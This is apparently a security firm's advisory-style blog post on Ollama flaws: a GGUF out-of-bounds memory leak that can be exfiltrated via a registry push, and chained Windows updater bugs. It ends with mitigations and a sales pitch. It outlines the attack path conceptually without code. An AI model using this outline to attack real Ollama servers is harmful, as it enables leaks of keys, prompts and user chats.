Critical Ollama vulnerability: remote memory exposure and what it means for LLM estates

Artificial intelligence is reshaping how organisations operate—driving innovation and efficiency. That same momentum introduces new threat surfaces that demand continuous monitoring and disciplined risk management. Researchers have now disclosed a critical issue in Ollama, the widely used open-source runtime for local large language models (LLMs), illustrating how complex AI infrastructure security can become.

CVE-2026-7482: “Bleeding Llama” memory disclosure

Security researchers have reported an out-of-bounds read in Ollama, tracked as CVE-2026-7482 and nicknamed “Bleeding Llama” by Cyera. Rated CVSS 9.1 (Critical), the flaw allows a remote, unauthenticated attacker to leak the entire memory footprint of the Ollama process. Estimates suggest it may affect more than 300,000 exposed servers worldwide—material risk for any organisation hosting LLM workloads on Ollama.

Why out-of-bounds reads matter

In plain terms, the program reads past the end of an allocated buffer. That pulls adjacent memory into attacker-influenced code paths, exposing secrets that should never leave the process boundary.

For Ollama, the weakness sits in the GGUF (GPT-Generated Unified Format) loader—specifically WriteTo() during quantization when building a model from an uploaded GGUF via /api/create. A crafted GGUF with tensor offset/size values exceeding the real file length causes the server to read beyond its buffer—classic information disclosure at process scale.

Business impact of a full-process memory leak

Successful exploitation of CVE-2026-7482 can be severe for confidentiality. Process memory may hold:

Environment variables with sensitive configuration.
API keys granting access to internal and external services.
System prompts exposing business logic or intellectual property.
Concurrent user chat content with direct privacy and compliance implications.

Attackers could move stolen artefacts off-box by pushing the resulting model blob to an attacker-controlled registry through /api/push. Dor Attias, a Cyera security researcher, noted that “An attacker can learn basically anything about the organisation from its AI inference: API keys, proprietary code, customer contracts, and more.” Integrations such as Claude Code widen blast radius if tool output is routed through the same Ollama instance.

Windows updater issues: chained pre-auth persistence

Separately, Striga researchers outlined two flaws in Ollama’s Windows update mechanism that can be chained for persistent code execution.

Publicly disclosed in January 2026 and, at the time of reporting, still without a vendor patch, they impact Ollama for Windows from 0.12.10 through 0.17.5:

CVE-2026-42248 (CVSS 7.7) — missing signature verification. Unlike macOS, the Windows client does not validate the updater binary’s signature before install—opening the door to malicious replacements.
CVE-2026-42249 (CVSS 7.7) — path traversal. The updater derives a local staging path from unsanitised HTTP response headers, enabling writes outside intended directories.

Combined with the client’s auto-start at Windows logon, an attacker who can influence the update channel could achieve durable compromise—reverse shells, credential theft (browser secrets, SSH keys), or dropper-driven persistence.

Mitigations that actually move the needle

Protecting LLM runtimes and their hosts needs layered controls:

Patch cadence: move Ollama to 0.17.1 or newer for CVE-2026-7482. On Windows, disable automatic updates and remove Ollama shortcuts from Startup (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) until official fixes ship for the updater issues.
Network restraint: restrict listener exposure to required IPs/ports; avoid direct internet placement where possible.
Exposure audits: find and remediate any Ollama instances visible from untrusted networks or the public internet.
Segmentation: isolate inference hosts with tight firewall policy to slow lateral movement.
Authentication front-ends: Ollama’s REST API ships without built-in auth—terminate with an authentication proxy or API gateway everywhere.
OS hardening: apply baseline hardening to Linux and Windows hosts—permissions, service minimisation, secure configuration.
Continuous monitoring: watch for anomalous model uploads, registry pushes, and data exfiltration patterns tied to LLM services.
LLM programme hygiene: periodic reviews of API key handling, prompt protection, and user-data processing.

ITCS VIP: securing AI platforms and the stacks beneath them

At ITCS VIP, we treat AI security as infrastructure security—not a marketing slide. Our engagements help organisations reduce attack surface and operationalise defensible LLM architectures:

Infrastructure hardening: Linux and Windows baselines aligned to industry practice.
Private AI & LLM assessments: configuration review, self-hosted risks (including Ollama-style deployments), API posture, data segregation, and prompt-injection resilience.
Linux security consulting: design and operational guidance for the platforms underpinning many AI estates.
Authentication proxies & API gateways: engineered controls ensuring only legitimate clients reach model endpoints.

Closing thought

Ollama’s disclosures are a blunt reminder: feature velocity without security discipline leaks memory, secrets, and trust. Pair technical hardening with periodic assurance and disciplined update management—especially on auto-update paths.

Do not wait for incident response to justify investment. Contact ITCS VIP for an assessment tailored to your AI infrastructure and threat model.

Editorial context: additional reporting on The Hacker News.

Critical Ollama flaw: remote memory leak and enterprise LLM risk